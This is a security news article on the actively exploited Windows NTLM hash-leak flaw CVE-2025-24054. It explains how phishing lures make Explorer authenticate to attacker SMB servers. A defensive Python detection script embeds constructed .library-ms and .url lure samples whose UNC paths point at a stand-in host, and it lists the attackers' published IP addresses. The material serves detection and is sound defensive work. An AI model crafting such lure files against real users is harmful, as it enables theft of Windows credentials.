A vulnerability in Windows that exposes NTLM hashes via .library-ms files is currently being actively exploited by hackers in phishing campaigns targeting government agencies and private companies.
The vulnerability, designated CVE-2025-24054, was fixed in Microsoft’s March 2025 Patch Tuesday. Initially, it was not considered actively exploited and the risk was assessed as “less likely.” The vulnerability was reported by BleepingComputer.
However, researchers at Check Point reported that they saw active exploitation of CVE-2025-24054 just a few days after the patches became available. They saw a spike between March 20 and 25, 2025.
Attackers used a single IP address that specialists had previously linked to the Russian state-sponsored threat group APT28 (‘Fancy Bear’). However, this is insufficient evidence for the researchers to make a definitive attribution.
NTLM (New Technology LAN Manager) is a Microsoft authentication protocol. It uses a challenge-response scheme in which the password hash, rather than the password itself, serves as the shared secret. Although NTLM never sends the password in plain text, it is now considered insecure because captured exchanges can be replayed and hashes can be cracked by brute force. Microsoft has therefore started to phase out NTLM in favor of Kerberos or Negotiate.
Phishing email with Dropbox link
In the attacks reported by Check Point, attackers sent phishing emails to organizations in Poland and Romania. The emails contained a Dropbox link to a ZIP archive. This archive contained a .library-ms file. A .library-ms file is a legitimate file type that, when opened, displays a Windows library containing files and folders from different sources.
In this phishing attack, the .library-ms file was set up to point to a path on an external SMB server controlled by the attacker. When a ZIP file containing a .library-ms file is unzipped, Windows Explorer automatically parses the extracted file, triggering the CVE-2025-24054 vulnerability. Windows then attempts to connect to the specified SMB server. During this connection, Windows attempts to authenticate itself via NTLM, allowing the attacker to intercept the user’s NTLM hashes.
In a later campaign, Check Point discovered phishing emails with direct attachments of .library-ms files. In this case, there was no ZIP archive. Downloading the .library-ms file was enough to trigger NTLM authentication to the external server. This showed that an archive file was not necessary to exploit the vulnerability.
Minimal user interaction is sufficient
Check Point reported that it discovered a global campaign on March 25, 2025, in which criminals distributed these files as bare attachments rather than inside an archive. According to Microsoft, this vulnerability is already triggered by minimal user interaction with the malicious file. This could be a single click, opening the context menu, or any other action that does not involve opening or executing the file.
The malicious archive also contained three other files: ‘xd.url’, ‘xd.website’ and ‘xd.link’. These exploit older vulnerabilities related to the leakage of NTLM hashes and were presumably added as a backup method in case the .library-ms approach fails.
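Both the .library-ms lure and the fallback .url/.website files work the same way: a text file that carries a UNC path to a host the attacker controls, which Explorer resolves over SMB. The following mail-gateway or triage check is an added example written for this article, not Check Point's or Microsoft's code. It assumes the documented XML layout of .library-ms files (a `simpleLocation/url` element under the `http://schemas.microsoft.com/windows/2009/library` namespace) and the INI layout of .url files (`URL=`, `IconFile=`, `WorkingDirectory=` keys); treating .website files as having the same INI layout is an assumption. The two IP addresses in the `KNOWN_BAD_HOSTS` set are the ones Check Point published; the sample files and their 192.0.2.10 host are constructed for the test.

```python
"""Flag .library-ms / .url / .website attachments whose paths point at an
external SMB host (constructed triage example, not vendor code)."""
from __future__ import annotations

import ipaddress
import re
import xml.etree.ElementTree as ET

LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"
# INI keys in .url files that may hold a UNC path (IconFile= is the classic leak).
URL_FILE_KEYS = ("url", "iconfile", "workingdirectory")
# Hosts published in the article's IoC list (defanged there as 159.196.128[.]120 etc.).
KNOWN_BAD_HOSTS = {"159.196.128.120", "194.127.179.157"}
# Address ranges treated as "inside the network"; everything else is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "::1/128")]
# \\host\share or \\host (host ends at the next separator or end of string).
UNC_RE = re.compile(r"^\\\\([^\\/]+)(?:[\\/]|$)")


def unc_host(path: str) -> str | None:
    """Return the host part of a UNC path, or None if the value is not UNC."""
    m = UNC_RE.match(path.strip())
    return m.group(1) if m else None


def is_external_host(host: str, allowed_hosts: set[str] = frozenset()) -> bool:
    """True when the host is a known IoC, a public IP, or a name not on the allow list."""
    if host.lower() in {h.lower() for h in allowed_hosts}:
        return False
    if host in KNOWN_BAD_HOSTS:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Hostname rather than IP: only allow-listed file servers are trusted.
        return True
    return not any(ip in net for net in INTERNAL_NETS)


def library_ms_locations(data: bytes) -> list[str]:
    """Extract every <url> under <simpleLocation> from a .library-ms document."""
    root = ET.fromstring(data)
    return [el.text.strip() for el in root.iter(LIBRARY_NS + "url") if el.text]


def url_file_locations(text: str) -> list[str]:
    """Extract path-bearing values (URL=, IconFile=, WorkingDirectory=) from a .url file."""
    found = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() in URL_FILE_KEYS:
            found.append(value.strip())
    return found


def suspicious_paths(filename: str, data: bytes,
                     allowed_hosts: set[str] = frozenset()) -> list[str]:
    """Return the UNC paths in an attachment that point outside the network."""
    name = filename.lower()
    if name.endswith(".library-ms"):
        paths = library_ms_locations(data)
    elif name.endswith((".url", ".website")):  # .website as INI is an assumption
        paths = url_file_locations(data.decode("utf-8", "replace"))
    else:
        return []
    return [p for p in paths
            if (h := unc_host(p)) and is_external_host(h, allowed_hosts)]


# Constructed samples (not the real lures): a library pointing at 192.0.2.10
# and a .url whose icon is fetched from the same host.
SAMPLE_LIBRARY_MS = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Documents</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\192.0.2.10\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""
SAMPLE_URL = b"""[InternetShortcut]
URL=https://example.com/
IconFile=\\\\192.0.2.10\\share\\icon.ico
IconIndex=1
"""

if __name__ == "__main__":
    for fname, blob in (("xd.library-ms", SAMPLE_LIBRARY_MS), ("xd.url", SAMPLE_URL)):
        print(fname, "->", suspicious_paths(fname, blob))
```

The check deliberately flags any UNC host that is neither an RFC 1918/loopback address nor on the caller's allow list, because the lure only needs a reachable SMB listener, not a specific address; pass the names of legitimate file servers in `allowed_hosts` to keep internal libraries from being quarantined.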
According to Check Point, the attackers used SMB servers with the IP addresses 159.196.128[.]120 and 194.127.179[.]157.
Captured NTLM hashes can be used to bypass authentication and obtain elevated access privileges. Although CVE-2025-24054 is only rated as a medium-severity vulnerability, the consequences could be serious.
Given the limited interaction required to exploit the vulnerability, it is recommended to consider this a high risk. Organizations are advised to install the March 2025 updates and disable NTLM authentication if unnecessary.